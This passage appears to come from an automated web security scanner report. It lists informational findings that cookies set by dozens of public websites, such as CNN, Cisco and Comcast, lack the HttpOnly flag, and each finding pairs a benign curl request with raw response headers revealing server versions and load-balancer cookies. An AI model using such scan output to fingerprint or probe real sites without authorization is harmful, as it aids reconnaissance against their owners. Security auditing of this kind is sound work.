Set-Cookie: ARPT=PKKIKIS64.99.81.10CKKUK; path=/
Date: Sat, 02 Apr 2011 13:56:10 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13
Location: http://status.blogrolling.com/
Vary: Accept-Encoding
Content-Length: 317
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://status.blogrolling.com/">here</a>.</p>
<
...[SNIP]...

14.70. http://www.business.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.business.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 3638
Content-Type: image/x-icon
Last-Modified: Mon, 25 Oct 2010 20:55:48 GMT
Accept-Ranges: bytes
ETag: "be55d08774cb1:cf1"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OUR DELa SAMa UNRa PUBa OTRa BUS UNI COM NAV INT CNT PRE LOC"
Cache-Control: max-age=31536000
Date: Sat, 02 Apr 2011 13:32:59 GMT
Connection: close
Set-Cookie: Client-IP=173.193.214.243

...[SNIP]...

14.71. http://www.buzznet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzznet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
Set-Cookie: bncom=173.193.214.243.71371301751865415; path=/; domain=.buzznet.com
Last-Modified: Thu, 30 Sep 2010 19:44:38 GMT
ETag: "47e-4ca4e8a6"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: image/x-icon

...[SNIP]...

14.72. http://www.carmax.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carmax.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carmax.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB041T0x0000000e_0xc70bb1bfCOIJJ; expires=Sat, 2-Apr-2011 14:42:07 GMT; path=/
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 09 May 2008 15:32:05 GMT
Accept-Ranges: bytes
ETag: "a06c2ad6e9b1c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:09 GMT

...[SNIP]...

14.73. http://www.cars.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cars.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:43 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 30 Jan 2009 17:18:54 GMT
ETag: "9c4b-57e-663c1b80"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:37:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: image/x-icon
Set-Cookie: cars_persist=3980465324.20480.0000; expires=Sat, 02-Apr-2011 14:08:00 GMT; path=/

...[SNIP]...

14.74. http://www.cheapoair.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapoair.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheapoair.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Mon, 13 Apr 2009 17:07:21 GMT
Accept-Ranges: bytes
ETag: "81483f4f5abcc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:24 GMT
Content-Length: 198
Set-Cookie: NSC_difbqp.dpn=4452341f3660;path=/


14.75. http://www.cheaptickets.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheaptickets.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 17:16:59 GMT
ETag: "136-49f8e1c7d78c0"
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 10:46:40 GMT
Content-Type: image/x-icon
Content-Length: 310
Server: Apache
Date: Sat, 02 Apr 2011 13:51:34 GMT
Age: 11093
Connection: keep-alive
Set-Cookie: NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3087845525d5f4f58455e445a4a423660;path=/

...[SNIP]...

14.76. http://www.cisco.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cisco.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cisco.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0
Last-Modified: Tue, 10 Jun 2008 19:13:16 GMT
ETag: "b8602b00"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:39:19 GMT
CDCHOST: ccows-sj-201
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:39:19 GMT
Connection: close
Set-Cookie: CP_GUTC=72.163.4.165.1301751559889702; path=/; expires=Wed, 26-Mar-36 13:39:19 GMT; domain=.cisco.com

...[SNIP]...

14.77. http://www.classesusa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classesusa.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.classesusa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:11 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1301751191674809; path=/; expires=Mon, 01-Apr-13 13:33:11 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"894-1301525391000"
Last-Modified: Wed, 30 Mar 2011 22:49:51 GMT
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: BIGipServerpl.eduprod=688136202.20480.0000; path=/

...[SNIP]...

14.78. http://www.cnn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cnn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:14 GMT
Server: Apache
Set-Cookie: CG=US:TX:Dallas; path=/
Last-Modified: Wed, 28 Oct 2009 14:26:23 GMT
Accept-Ranges: bytes
Content-Length: 11502
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 12:38:17 GMT
Content-Type: image/x-icon
X-Pad: avoid browser bug

...[SNIP]...

14.79. http://www.collegeconfidential.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeconfidential.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegeconfidential.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 18 Oct 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 318
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:57:54 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerims_ccinfo_pool=3298375690.20480.0000; path=/

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

14.80. http://www.collegehumor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...

14.81. http://www.collegesurfing.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegesurfing.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 28 Aug 2007 01:10:23 GMT
ETag: "2190070-336-438b8233a3dc0"
Accept-Ranges: bytes
Content-Length: 822
Connection: close
Content-Type: image/bmp
Set-Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; path=/

BM6.......6...(.......................................Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*.Z*
...[SNIP]...

14.82. http://www.comcast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comcast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1406
Content-Type: image/x-icon
Last-Modified: Mon, 14 Mar 2011 22:45:52 GMT
Accept-Ranges: bytes
ETag: "090259299e2cb1:149e"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 12:43:30 GMT
Connection: close
Set-Cookie: BIGipServerpool_comcastcom_VIP1=86896965.20480.0000; path=/

..............h.......(....... ...................................................\N......LJL.............$"$.4*..tj......................D:..|v......,"..l^..lnl.....424.........................LB....
...[SNIP]...

14.83. http://www.contacthr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contacthr.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.contacthr.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: trackerID=157429950; expires=Mon, 02-Apr-2012 14:09:13 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1626

Input string was not in a correct format.<br> at System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal)
at System.Numbe
...[SNIP]...

14.84. http://www.cornell.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cornell.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cornell.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l JRun/4.0
Last-Modified: Wed, 15 Sep 2010 19:11:24 GMT
ETag: "2da6bb-47e-49051187a3db1"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Set-Cookie: BALANCEID=balancer.cf068; path=/; domain=.cornell.edu

............ .h.......(....... ..... .............................................rr..88..........88..rr..................................ss..FF..........................FF..ss......................\\
...[SNIP]...

14.85. http://www.coupons.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coupons.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coupons.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 27 Apr 2010 17:08:35 GMT
Accept-Ranges: bytes
ETag: "872d87452ce6ca1:3f3e"
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:25 GMT
CI_SVR_ID: 10/11
Set-Cookie: NSC_Njdsptjuft-IUUQ=ffffffffc3a0141a45525d5f4f58455e445a4a423660;Version=1;Max-Age=600;path=/

............ .h.......(....... ..... .....................................Q..Q..Q......................................................Q..Q..Q..Q..Q.P..........................................
...[SNIP]...

14.86. http://www.cracked.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cracked.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cracked.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
Last-Modified: Tue, 14 Jul 2009 21:42:53 GMT
ETag: "b10423-37e-46eb15220f140"-gzip
Content-Type: image/x-icon
Expires: Sat, 02 Apr 2011 13:33:14 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:14 GMT
Content-Length: 894
Connection: close
Set-Cookie: BIGipServerorigin.cracked.com=1050020106.20480.0000; path=/

..............h.......(....... .................................................[ZVC>M86L@<YTXc........................|zo..(..l....................yvs.............TVP..:"..%..".....-,.,&....&..#.....
...[SNIP]...

14.87. http://www.curse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.curse.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: no-cache,private
Content-Length: 23341
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

14.88. http://www.cyberdefender.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cyberdefender.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberdefender.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: clickforensics=208.118.60.116.1301751386236547; path=/
Last-Modified: Fri, 08 Oct 2010 18:52:31 GMT
ETag: "128eb5-47e-4921f8347b9c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................................jki!jki.jki.jki.jki.jki!....................................jkiajki.....wv..wv......jki.jkia..........................
...[SNIP]...

14.89. http://www.dallasnews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dallasnews.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dallasnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: ececluster=R1163981390; path=/; expires=Sun, 03-Apr-2011 13:38:53 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=cbLXNXlNtTLBMhK6jk7cRQSLRDz7k2q6Jy75gF2H1rTfSpNtTSJJ!-970429422; path=/; HttpOnly
x-svrl-ap: test-(null)
Vary: Accept-Encoding
Content-Length: 64474
Date: Sat, 02 Apr 2011 13:36:50 GMT
X-Varnish: 1530443752 1530427325
Age: 165
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT:5
x-svrl: V3


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></titl
...[SNIP]...

14.90. http://www.dealer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealer.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19895
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 14:16:53 GMT
Connection: close
Set-Cookie: exp_last_visit=986393813; expires=Sun, 01-Apr-2012 14:16:53 GMT; path=/
Set-Cookie: exp_last_activity=1301753813; expires=Sun, 01-Apr-2012 14:16:53 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...

14.91. http://www.deere.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deere.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deere.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:57 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 29 May 2003 16:44:18 GMT
ETag: "24e1bc-0-3bed045767c80"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: image/x-icon
Set-Cookie: BIGipServerdcdct-19th=234518948.13858.0000; path=/


14.92. http://www.directv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directv.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Wed, 21 Nov 2007 16:56:17 GMT
Accept-Ranges: bytes
ETag: "80cea66e5f2cc81:7d9"
Server: Microsoft-IIS/6.0
Set-Cookie: TLTHID=DD21B83B4FE66273AF7ED4AC3335D73E; Path=/; Domain=.directv.com
Set-Cookie: TLTSID=DD21B83B4FE66273AF7ED4AC3335D73E; Path=/; Domain=.directv.com
Date: Sat, 02 Apr 2011 13:26:09 GMT

............ .h.......(....... ..... ............................................................................................................................................................3......
...[SNIP]...

14.93. http://www.discovercard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discovercard.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.discovercard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:21 GMT
Server: Apache
Set-Cookie: v1st=D8BCADAE8D52A0E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.discovercard.com
Last-Modified: Thu, 26 Jun 2008 22:04:17 GMT
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/x-icon


14.94. http://www.doityourself.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doityourself.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.doityourself.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 05 Aug 2010 22:36:08 GMT
ETag: "3362228-37e-48d1b2d26e600"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
Date: Sat, 02 Apr 2011 13:43:19 GMT
Age: 310500
Connection: keep-alive
Server: IBSrv 1.0
Set-Cookie: BIGipServerdiy_pool=1004867756.52514.0000; path=/

..............h.......(....... ...................................................................................................................................................|.u6..~...............
...[SNIP]...

14.95. http://www.drugstore.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drugstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.drugstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Tue, 29 Mar 2011 16:20:02 GMT
Accept-Ranges: bytes
ETag: "025de272deecb1:77ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
